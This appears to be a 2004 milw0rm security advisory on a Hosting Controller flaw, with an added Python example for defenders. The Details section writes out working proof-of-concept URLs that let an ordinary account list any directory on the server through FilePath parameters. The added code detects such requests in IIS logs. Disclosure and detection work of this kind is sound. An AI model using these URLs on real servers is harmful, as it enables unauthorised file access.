Advisory Information
-------------------------

Software Package    : Hosting Controller
Vendor Homepage     : http://www.hostingcontroller.com
Platforms           : Windows based servers
Vulnerable Versions : All versions (tested on v6.1 Hotfix 1.4)
Vendor Contacted    : 12/5/2004
Release Date        : 12/7/2004

Summary
------------

Hosting Controller is a complete array of Web hosting automation tools
for the Windows Server family platform.

Hosting Controller has a security flaw which allows attackers, once logged
in with an ordinary account, to browse any file and any directory on that
server.

Details
---------

Vulnerability: browsing directories and files on the system.

Foolish vulnerability: two administration pages take a FilePath parameter
straight from the URL and list whatever directory it names, with no check
that the path lies inside the account's own hosting space.

1) This vulnerability is in admin/mail/Statsbrowse.asp; attackers can view
the whole hard disk by using this file.

Log in with your account:

http://www.yoursite.com/admin

Now you see:

http://www.yoursite.com/admin/main.asp

Change this URL to:

http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0

2) This vulnerability is in admin/iis/Generalbrowse.asp; attackers can view
the whole hard disk by using this file.

Log in with your account:

http://www.yoursite.com/admin

Now you see:

http://www.yoursite.com/admin/main.asp

Change this URL to:

http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\

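The root cause in both pages is the same: a user-supplied FilePath is trusted as-is. The following Python is an added example for defenders, not code from the advisory or from Hosting Controller. It shows the confinement check the server side should apply before listing anything (normalise the Windows path, then require it to stay under the account's permitted root) and reuses that check to hunt through IIS W3C log lines for requests to the two browse pages named above whose FilePath escapes that root. The allowed root C:\HostingSites, the log field layout and the log lines themselves are constructed for the example.

```python
import ntpath
from urllib.parse import parse_qs

# Browse pages named in the advisory; IIS paths are case-insensitive, so compare lowercased.
BROWSE_ENDPOINTS = ("/admin/mail/statsbrowse.asp", "/admin/iis/generalbrowse.asp")

# Constructed IIS 6 W3C extended log excerpt (not a real capture). The '#Fields:' line
# names the columns; real logs carry more columns but the parser keys on the header.
SAMPLE_LOG = r"""
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2004-12-05 10:15:01 GET /admin/main.asp - reseller1 10.0.0.5 200
2004-12-05 10:15:30 GET /admin/mail/Statsbrowse.asp FilePath=c:\&Opt=3&level=1&upflag=0 reseller1 10.0.0.5 200
2004-12-05 10:16:02 GET /admin/iis/Generalbrowse.asp FilePath=C:\HostingSites\reseller1\www reseller1 10.0.0.5 200
2004-12-05 10:16:40 GET /admin/iis/Generalbrowse.asp FilePath=C:\HostingSites\reseller1\..\..\Windows\system32 reseller1 10.0.0.5 200
"""


def is_within_root(requested: str, allowed_root: str) -> bool:
    """Confinement check a browse page should run before listing a directory.

    ntpath.normpath collapses '..' segments and mixed slashes without touching the
    filesystem, so it works on any platform; normcase mirrors NTFS case-insensitivity.
    Returns True only when the normalised path is allowed_root itself or lies below it.
    """
    req = ntpath.normcase(ntpath.normpath(requested))
    root = ntpath.normcase(ntpath.normpath(allowed_root)).rstrip("\\")
    return req == root or req.startswith(root + "\\")


def parse_iis_log(text: str) -> list:
    """Minimal W3C extended log parser: column names come from the '#Fields:' directive."""
    fields, records = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any header
        values = line.split()
        if len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def find_browse_abuse(log_text: str, allowed_root: str) -> list:
    """Flag requests to the browse pages whose FilePath leaves allowed_root.

    Returns (timestamp, client ip, user, endpoint, requested path) tuples, oldest first.
    """
    hits = []
    for rec in parse_iis_log(log_text):
        stem = rec["cs-uri-stem"].lower()
        if stem not in BROWSE_ENDPOINTS or rec["cs-uri-query"] == "-":
            continue
        # parse_qs percent-decodes each value once, matching what the ASP page would see.
        params = parse_qs(rec["cs-uri-query"], keep_blank_values=True)
        for path in params.get("FilePath", []):
            if not is_within_root(path, allowed_root):
                hits.append((f'{rec["date"]} {rec["time"]}', rec["c-ip"],
                             rec["cs-username"], stem, path))
    return hits


if __name__ == "__main__":
    for hit in find_browse_abuse(SAMPLE_LOG, r"C:\HostingSites"):
        print("out-of-root browse:", *hit)
```

Run against the constructed log, the two requests that reach c:\ and C:\Windows\system32 are reported and the one that stays inside the reseller's own tree is not. On a live server the same check must be applied after the path is resolved by the operating system (junctions, 8.3 short names and UNC paths are not handled by string normalisation alone), and the allowed root should be the account's own directory, not the hosting parent.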
Solution
----------

The vendor was notified and has released a patch.

Update your software.

Credits
---------

Discovered on May 6, 2004 by (\/) Mouse
Mouse@Shabgard.org

Additional Research: s7az2mm and bl2k
http://Shabgard.org

References
-------------

http://isun.Shabgard.org/hc.html
http://isun.Shabgard.org/hc.txt

# milw0rm.com [2004-12-05]